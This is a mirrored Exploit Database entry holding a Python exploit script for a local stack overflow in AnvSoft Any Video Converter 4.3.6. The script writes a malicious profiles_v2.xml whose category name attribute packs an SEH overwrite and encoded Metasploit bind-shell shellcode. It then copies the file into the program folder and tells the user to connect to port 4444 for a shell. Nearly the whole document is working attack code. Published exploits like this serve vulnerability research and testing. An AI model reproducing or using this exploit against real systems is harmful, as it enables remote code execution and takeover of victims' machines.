AnvSoft Any Video Converter 4.3.6 – Local Stack Overflow

• Exploit Database
• 51 阅读

• 作者： cikumel
  日期： 2012-05-03
• 类别：

  • local
  平台：

  • windows
• 来源：https://www.exploit-db.com/exploits/18826/

• #!/usr/bin/python
  #
  # Exploit Title: AnvSoft Any Video Converter 4.3.6 Stack Overflow
  # Author: cikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research
  # Website: http://www.spentera.com
  # Platform: Windows
  # Tested on: Windows XP SP3
  # Based on POC by Vulnerability-Lab (http://www.exploit-db.com/exploits/18717/)
  # 
  
  import os,shutil,time,sys
  
  def banner():
  print "\n\tAnvSoft Any Video Converter 4.3.6 Stack Overflow"
  print "\tbased on POC by Vulnerability-Lab (www.vulnerability-lab.com)"
  print "\tcikumel (@mhx_x) and y0k (@riy0_wid) from @spentera research\n"
  print "\t----------------------------------------------------\n"
  
  junk = "\x90" * 328
  nseh = "\xeb\x06\x90\x90"
  seh= "\xe4\xf3\x04\x10"
  
  # win32_bind -EXITFUNC=process LPORT=4444 Size=696 Encoder=Alpha2 http://metasploit.com
  # badchars = "\x00\x0a\x0d\x22\x26\x3e"
  code = ("\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff\x49\x49\x49\x49\x49\x49"
  "\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x49\x51\x48\x5a\x6a\x48"
  "\x58\x30\x41\x30\x50\x42\x6b\x42\x41\x58\x41\x42\x32\x42\x41\x32"
  "\x41\x41\x30\x41\x41\x58\x50\x38\x42\x42\x75\x59\x79\x69\x6c\x30"
  "\x6a\x78\x6b\x32\x6d\x78\x68\x4b\x49\x4b\x4f\x4b\x4f\x4b\x4f\x41"
  "\x70\x6c\x4b\x30\x6c\x51\x34\x66\x44\x6e\x6b\x72\x65\x35\x6c\x6c"
  "\x4b\x73\x4c\x67\x75\x30\x78\x67\x71\x68\x6f\x4c\x4b\x50\x4f\x47"
  "\x68\x4e\x6b\x41\x4f\x67\x50\x55\x51\x7a\x4b\x42\x69\x6c\x4b\x74"
  "\x74\x4c\x4b\x36\x61\x78\x6e\x74\x71\x4b\x70\x4f\x69\x6e\x4c\x4f"
  "\x74\x4b\x70\x70\x74\x65\x57\x4a\x61\x6b\x7a\x56\x6d\x47\x71\x4b"
  "\x72\x5a\x4b\x58\x74\x35\x6b\x72\x74\x75\x74\x34\x68\x30\x75\x4b"
  "\x55\x4c\x4b\x43\x6f\x57\x54\x36\x61\x68\x6b\x72\x46\x4e\x6b\x56"
  "\x6c\x30\x4b\x6e\x6b\x43\x6f\x65\x4c\x67\x71\x4a\x4b\x44\x43\x54"
  "\x6c\x4c\x4b\x6f\x79\x70\x6c\x74\x64\x35\x4c\x70\x61\x39\x53\x57"
  "\x41\x69\x4b\x50\x64\x6c\x4b\x47\x33\x70\x30\x6c\x4b\x57\x30\x76"
  "\x6c\x6c\x4b\x72\x50\x45\x4c\x6e\x4d\x4c\x4b\x53\x70\x43\x38\x63"
  "\x6e\x55\x38\x6c\x4e\x30\x4e\x54\x4e\x78\x6c\x42\x70\x69\x6f\x6e"
  "\x36\x53\x56\x63\x63\x70\x66\x33\x58\x54\x73\x36\x52\x53\x58\x61"
  "\x67\x34\x33\x57\x42\x41\x4f\x53\x64\x39\x6f\x5a\x70\x45\x38\x68"
  "\x4b\x7a\x4d\x39\x6c\x57\x4b\x66\x30\x6b\x4f\x49\x46\x63\x6f\x4b"
  "\x39\x79\x75\x65\x36\x4f\x71\x58\x6d\x47\x78\x63\x32\x70\x55\x73"
  "\x5a\x37\x72\x4b\x4f\x68\x50\x70\x68\x4e\x39\x74\x49\x4c\x35\x4c"
  "\x6d\x71\x47\x4b\x4f\x4a\x76\x32\x73\x63\x63\x50\x53\x50\x53\x31"
  "\x43\x52\x63\x73\x63\x47\x33\x33\x63\x59\x6f\x4e\x30\x31\x76\x30"
  "\x68\x77\x61\x51\x4c\x31\x76\x51\x43\x4d\x59\x6a\x41\x6f\x65\x45"
  "\x38\x4f\x54\x66\x7a\x50\x70\x6a\x67\x66\x37\x79\x6f\x6e\x36\x61"
  "\x7a\x64\x50\x33\x61\x42\x75\x69\x6f\x6a\x70\x33\x58\x4c\x64\x6e"
  "\x4d\x56\x4e\x39\x79\x73\x67\x4b\x4f\x7a\x76\x72\x73\x70\x55\x59"
  "\x6f\x58\x50\x61\x78\x6a\x45\x41\x59\x6d\x56\x42\x69\x66\x37\x4b"
  "\x4f\x4e\x36\x46\x30\x76\x34\x31\x44\x50\x55\x69\x6f\x4e\x30\x6e"
  "\x73\x75\x38\x6b\x57\x64\x39\x49\x56\x43\x49\x46\x37\x39\x6f\x4b"
  "\x66\x66\x35\x39\x6f\x68\x50\x75\x36\x62\x4a\x43\x54\x72\x46\x65"
  "\x38\x65\x33\x70\x6d\x4f\x79\x6b\x55\x32\x4a\x46\x30\x46\x39\x41"
  "\x39\x38\x4c\x4d\x59\x4d\x37\x41\x7a\x52\x64\x4f\x79\x6b\x52\x70"
  "\x31\x4b\x70\x4c\x33\x4f\x5a\x49\x6e\x77\x32\x76\x4d\x69\x6e\x31"
  "\x52\x64\x6c\x4e\x73\x4e\x6d\x43\x4a\x34\x78\x6e\x4b\x6e\x4b\x6c"
  "\x6b\x50\x68\x62\x52\x4b\x4e\x78\x33\x54\x56\x4b\x4f\x73\x45\x32"
  "\x64\x39\x6f\x38\x56\x61\x4b\x32\x77\x43\x62\x70\x51\x73\x61\x71"
  "\x41\x63\x5a\x44\x41\x31\x41\x43\x61\x63\x65\x56\x31\x6b\x4f\x4e"
  "\x30\x53\x58\x4c\x6d\x5a\x79\x54\x45\x58\x4e\x33\x63\x4b\x4f\x6b"
  "\x66\x50\x6a\x39\x6f\x4b\x4f\x70\x37\x4b\x4f\x38\x50\x4e\x6b\x62"
  "\x77\x49\x6c\x4c\x43\x49\x54\x43\x54\x69\x6f\x5a\x76\x56\x32\x79"
  "\x6f\x6e\x30\x50\x68\x53\x4e\x6a\x78\x7a\x42\x44\x33\x52\x73\x39"
  "\x6f\x4e\x36\x79\x6f\x68\x50\x48")
  
  sisa = "\x90" * (1000-len(code)) 
  
  poc = "<root>\n"
  poc+= "<categories>\n"
  poc+= "<category name=\""+junk+nseh+seh+code+sisa+"\" id=\"0\" icon=\"cat_all.bmp\" desc=\"All Profiles\"/>\n"
  poc+= "</categories>\n"
  poc+= "<groups></groups>\n<profiles></profiles>\n</root>\n"
  
  file = "profiles_v2.xml"
  splash=os.path.abspath(file)
  profdir="C:\Program Files\AnvSoft\Any Video Converter Professional"
  
  writeFile = open(file, "w")
  if os.name == 'nt':
  	if os.path.isdir(profdir):
  		try:
  			writeFile.write(poc)
  			banner()
  			print "[*] Creating the malicious",file
  			time.sleep(1)
  			print "[*] Malicious",file,"created.."
  			writeFile.close()
  			shutil.copy2(splash,profdir)
  			print "[*] File",file,"has been copied to",profdir
  			print "[*] Now open AnvSoft program and telnet to port 4444"
  		except IOError:
  			print "[-] Could not write to destination folder, check permission.."
  			sys.exit()
  	else:
  		print "[-] Could not find installation directory, is AnvSoft Any Video Converter installed?"
  		sys.exit()
  else:
  	print "[-] Please run this script on Windows."
  	sys.exit()